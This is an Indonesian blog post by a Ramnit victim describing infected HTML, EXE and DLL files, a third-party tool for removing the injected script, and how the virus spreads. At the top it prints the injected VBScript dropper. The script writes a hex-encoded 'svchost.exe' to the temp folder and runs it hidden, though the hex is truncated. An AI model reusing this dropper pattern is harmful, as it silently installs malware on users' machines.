DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000 // Kodenya terlalu panjang disini
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0 //
-->
Biarin tuh kode vbs saya taroh di bagian paling atas, kalo boleh dibilang saya misuh-misuh ndak karuan waktu semua file berekstensi .exe .dll .html dan .htm saya terinfeksi virus sialan bernama RAMNIT, kalo di tanem, mungkin pisuhan saya sampe 2 hektar kale yah ? Bayangkan saja bro/sist, mau ngetik lemotnya minta ampun, mau internetan lemotnya minta ampun, eh ternyata ukuran file di komputer saya nambah semua karena keinject kode VBS tersebut, apalagi di banyak file html dan htm, di bagian akhir tag </html> pasti ada tambahan kode sialan ini, ngeselin banget ndak ? tuh kan contoh skrinsut nya ada di atas kode.....
waktu saya scann make avira, masya allah, ada seribu sampe dua ribu lebih file htm/html terinfeksi, plus file exe dan dll, bahkan beberapa rujukan penting yang mau saya pakai untuk bahan menulis buku kedua ikut terdeteksi, waktu saya klik "clean all" sialan lagi......siallll banget, file nya kehapus dan masuk folder quarantine, ya ampoooooooooooonnnnnnn.............dosa apa si w3d0z gibas aka dementor ini, asem
setelah browsing untuk mencari solusi, ( karena antivirus kaga bisa nolong malah nambahin masalah cz menghapus file-file penting ) saya menemukan file ini
kalo broken link cari aja di sini atau nunggu saya bisa aplot ndiri dah.....
aplikasi itu saya coba untuk membersihkan file yang terinfeksi tanpa menghapus file asli dan bener, berhasil, tapi ada syaratnya
Aplication support : Windows XP/Vista/2000
Java must be supported for Windows XP/Vista/2000/windows 7
Ram dan disk space sistem menyesuaikan aja lah terserah asal jangan make floppy buat sistemnya :p
1 Install Java dolo, donlot aja java di toko-toko terdekat [ mbuyak wes ]
ojok mengeluh rek klo koneksi dial up, donlot .msi installler nya lama, emang fileinstaller java kecil, tapi ini bukan setup stand alone lho, begitu ngeklik run ente harus nunggu donlot installer secara full, jadi jangan seneng dolo
Nah inilah instalasi yang sebenernya....
2 Download file dan extract ke direktori mana aja deh yang ente suka [ wes kadung mumet aku ]
3 jalankan file nya [ rodanya di puter, starter diengkol dan tarik mang...nabrak tembok ]
Tuh ndak usah gede2 ya gambarnya, klo pengen jelas di klik aja lah,
ente akan menemukan halaman window seperti itu setelah run atau menjalankan filr vbs dropper remover.exe
Point 1 klik Choose root dir untuk memilih drive yang terinfeksi
point 2 klik start untuk memulai pembersihan
point 3 tunggu beberapa saat
point 4 pada bagian cleaned akan muncul report "FATAL! Virus found. H:\lamaran di madiun print\Crop Circle Kemunculannya di Indonesia - Asli Jejak UFO atau Buatan Manusia ~ Blog Misteri Hawkson_files\ifr.htm
Done! Virus code removed."
Kalo munculnya kayak gitu berarti file htm/html berhasil di bersihkan tanpa menghapusnya, yang di remove cuman kode VBS nya saja kok
point 5 pada bagian failed itu adalah report gagal, saya ndak tau tulisanya gimana, karena saya berhasil membersihkan seluruh isi flasdisk saya, so, semoga ente gagal n mau bagi info ya seperti apa tulisan report di bagian failed kwkwkwkwkw
5 mulai hancurkan semua kode VBS yang menginfeksi seluruh komputer andaaaaaaaaaaa
6 perlu di ingat, yang dibersihkan hanya file berekstensi htm dan html jika file nya exe, kata si pemilik aplikasi sih antivirus tetaplah yang utama.
Tips untuk menghindari
Cara penyebaran vius ini adalah melalui HTML file, flasdisk dan media-media lain yang biasa dipakai menyebar virus. keunikanya adalah, dia bisa berkembang biak di drive lain selain drive sistem, sehingga saat startup, virus ini akan langsung beraksi, deepfreeze atau shadow defender kaga bakal membantu, mereka mem-freeze sistem, tapi tidak bisa menangkal semua proses yang ada di hardisk saat startup, percuma donk ? saat mati komputer kesayangan kita akan selamat dalam artian semua infeksi terhapus freezer, tapi saat booting lagi ? ya ancur lagi!!!!!!!!!!!!!!
jadi hati-hati jika ingin mendownload halaman web tertentu secara penuh, mungkin juga termasuk blog ini, hemmmm bukan, bukan pemilik web atau blog nya yang salah, tapi bisa saja induk file virus itu udah nongkrong dikomputer warnet yang kalian pakai, atau ikut terdownload lewat bokep yang kalian unduh, pokoe serba dompleng lah, beberapa kasus pernah terjadi termasuk kasus saya, induk virus ini terdownload otomatis lewat IDM saat komputer saya terhubung ke internet.
begitu terinstall langsung attribut hidden, memanfaatkan autorun untuk menyebar lewat flashdisk atau antar hardisk dalam satu komputer, nah
saat kalian donlot halaman web secara lengkap, disaat itulah virus menginfeksi, kemudian virus akan berjalan serta menyebar tepat ketika file .html yang kalian donlot tadi dibuka di komputer rumah, menginfeksi semua file yang ada, bahkan memanggil induk virus di internet dengan cara donlot otomatis tadi [ sialan bener pembuat virusnya, mau dong diajarin buat ]
Wuihhhhh mangkel banget, masak master Photoshop, Driver Epson, Framework dan semua master intaller software yang memiliki data berekstensi HTM langsung terdeteksi smua, lha kalo dihapus kan jadinya korup waktu mau di instal ? bangkrut deh aku.......haaaaaaaaaaaaaaaaaaaaaaa
Katanya seh virus sialan kampret elek ini bisa memanggil banyak variasi virus berbeda dari internet, jadi belum ada yang bisa memastikan virus apa saja yang ikut didonlot dengan program si kampret sialan ini.
baca sendiri deh, saya kan bukan analis virus, saya cuman mau numpang ngamuk saja sambil membagikan aplikasi penting biar ndak jatuh banyak korban lagi ( sok pahlawan banget seh dit adit ) hahahahahahaha
0 komentar:
Posting Komentar